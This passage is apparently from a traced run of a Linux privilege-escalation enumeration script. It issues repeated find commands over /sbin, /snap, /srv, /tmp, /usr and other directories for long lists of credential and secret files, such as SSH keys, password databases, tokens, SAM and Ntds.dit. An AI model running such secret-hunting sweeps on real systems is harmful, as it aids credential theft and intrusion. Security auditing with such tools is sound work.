\"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" -o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name \"db.php\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_RUN=`eval_bckgrd "find /run -name \"*.socket\" -o -name \"*.service\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SBIN=`eval_bckgrd "find /sbin -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name \"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" -o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name \"db.php\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SNAP=`eval_bckgrd "find /snap -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name \"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" -o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name \"db.php\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SRV=`eval_bckgrd "find /srv -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name \"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" -o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name \"db.php\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYS=`eval_bckgrd "find /sys -name \"*.socket\" -o -name \"*.service\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.socket\" -o -name \"*.service\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.socket\" -o -name \"*.service\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_TMP=`eval_bckgrd "find /tmp -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name \"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"agent*\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" -o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name \"db.php\" -o -name \"SYSTEM\" -o -name \"sess_*\" -o -name \"*.ovpn\" -o -name \"*.rdg\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"known_hosts\" -o -name \".k5login\" -o -name \"security.sav\" -o -name \"hostapd.conf\" -o -name \"*.keyring\" -o -name \"cesi.conf\" -o -name \"storage.php\" -o -name \"*vnc*.ini\" -o -name \"docker.socket\" -o -name \"server.xml\" -o -name \"httpd.conf\" -o -name \"krb5.keytab\" -o -name \".github\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_USR=`eval_bckgrd "find /usr -name \"hosts.equiv\" -o -name \"autologin\" -o -name \"authorized_hosts\" -o -name \".ldaprc\" -o -name \".git\" -o -name \".lesshst\" -o -name \"*.service\" -o -name \"AzureRMContext.json\" -o -name \".bashrc\" -o -name \"authorized_keys\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \".rhosts\" -o -name \"rsyncd.conf\" -o -name \"kadm5.acl\" -o -name \"index.dat\" -o -name \"accessTokens.json\" -o -name \"TokenCache.dat\" -o -name \".sudo_as_admin_successful\" -o -name \"unattend.xml\" -o -name \"*.key\" -o -name \"pagefile.sys\" -o -name \"printers.xml\" -o -name \"*vnc*.xml\" -o -name \".erlang.cookie\" -o -name \"*.gpg\" -o -name \"*.pfx\" -o -name \"credentials\" -o -name \"https-xampp.conf\" -o -name \"*.timer\" -o -name \"gitlab.yml\" -o -name \"000-default.conf\" -o -name \"setupinfo\" -o -name \"passwd\" -o -name \"SecEvent.Evt\" -o -name \".plan\" -o -name \"*vnc*.c*nf*\" -o -name \"*.kdbx\" -o -name \"*.sqlite3\" -o -name \"docker-compose.yml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"debian.cnf\" -o -name \"access_tokens.db\" -o -name \"id_rsa*\" -o -name \".pypirc\" -o -name \"*.socket\" -o -name \"php.ini\" -o -name \".env\" -o -name \"anaconda-ks.cfg\" -o -name \"ntuser.dat\" -o -name \"unattend.txt\" -o -name \"access.log\" -o -name \".htpasswd\" -o -name \"KeePass.ini\" -o -name \"bash.exe\" -o -name \"*.p12\" -o -name \"protecteduserkey.bin\" -o -name \"ftp.config\" -o -name \"database.php\" -o -name \"*.keystore\" -o -name \"ipsec.conf\" -o -name \"my.cnf\" -o -name \"web*.config\" -o -name \"wsl.exe\" -o -name \"filezilla.xml\" -o -name \"*.swp\" -o -name \"gvm-tools.conf\" -o -name \"postgresql.conf\" -o -name \"KeePass.enforced*\" -o -name \"ddclient.conf\" -o -name \"*vnc*.txt\" -o -name \"error.log\" -o -name \"snmpd.conf\" -o -name \".recently-used.xbel\" -o -name \"Ntds.dit\" -o -name \"software.sav\" -o -name \"rsyncd.secrets\" -o -name \"*.crt\" -o -name \"sysprep.xml\" -o -name \"wcx_ftp.ini\" -o -name \"pgadmin*.db\" -o -name \"recentservers.xml\" -o -name \"*.pgp\" -o -name \"groups.xml\" -o -name \"*.db\" -o -name \"sitemanager.xml\" -o -name \"system.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"SAM\" -o -name \"creds*\" -o -name \"sites.ini\" -o -name \".gitconfig\" -o -name \"*.sqlite\" -o -name \"datasources.xml\" -o -name \"software\" -o -name \"my.ini\" -o -name \"scclient.exe\" -o -name \"docker.sock\" -o -name \"config.php\" -o -name \"*.der\" -o -name \"elasticsearch.y*ml\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"ffftp.ini\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"system\" -o -name \"wp-config.php\" -o -name \"winscp.ini\" -o -name \"unattended.xml\" -o -name \"scheduledtasks.xml\" -o -name \"Dockerfile\" -o -name \"drives.xml\" -o -name \"backup\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.cer\" -o -name \".*_history.*\" -o -name \"iis6.log\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"default.sav\" -o -name \"secrets.yml\" -o -name \"unattend.inf\" -o -name \"pg_hba.conf\" -o -name \".profile\" -o -name \".git-credentials\" -o -name \"ConsoleHost_history.txt\" -o -name \".google_authenticator\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"ftp.ini\" -o -name \"FreeSSHDservice.ini\" -o -name \"*credential*\" -o -name \"ssh*config\" -o -name \"sysprep.inf\" -o -name \"legacy_credentials.db\" -o -name \"tomcat-users.xml\" -o -name \"fastcgi_params\" -o -name \"mongod*.conf\" -o -name \"krb5.conf\" -o -name \"ipsec.secrets\" -o -name \"redis.conf\" -o -name \"backups\" -o -name \".vault-token\" -o -name \"KeePass.config*\" -o -name \"*.ftpconfig\" -o -name \"AppEvent.Evt\" -o -name \"mosquitto.conf\" -o -name \"autologin.conf\" -o -name \"ws_ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.csr\" -o -name \"gitlab.rm\" -o -name \"*.gnupg\" -o -name \"*password*\" -o -name \"appcmd.exe\" -o -name 